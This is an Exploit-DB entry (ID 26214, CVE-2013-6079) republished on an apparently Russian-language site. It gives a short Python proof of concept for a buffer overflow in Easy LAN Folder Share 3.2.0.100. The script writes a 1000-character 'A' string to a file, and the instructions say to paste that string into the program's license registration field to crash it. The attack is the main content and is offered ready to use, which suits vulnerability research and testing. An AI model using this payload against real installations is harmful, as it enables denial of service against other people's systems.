- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 26214
- Проверка EDB
-
- Пройдено
- Автор
- ARIARAT
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2013-6079
- Дата публикации
- 2013-06-14
Код:
# Exploit Title: Easy LAN Folder Share Version 3.2.0.100 Buffer Overflow vulnerability(SEH)
# Date: 14-06-2013
# Exploit Author: ariarat
# Vendor Homepage: http://www.mostgear.com
# Software Link: http://download.cnet.com/Easy-LAN-Folder-Share/3000-2085_4-10909166.html
# Version: 3.2.0.100
# Tested on: [ Windows 7 & windows XP sp2,sp3]
#============================================================================================
# After creating txt file,open created file and copy the AAA... string to clipboard and
# then paste in "Register -> Activate License -> Registration Code" section.
# ** type any character in User Name text field.
#
#============================================================================================
# Contact :
#------------------
# Web Page : http://ariarat.blogspot.com
# Email : [email protected]
#============================================================================================
#!/usr/bin/python
filename="string.txt"
buffer = "\x41" * 1000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
- Источник
- www.exploit-db.com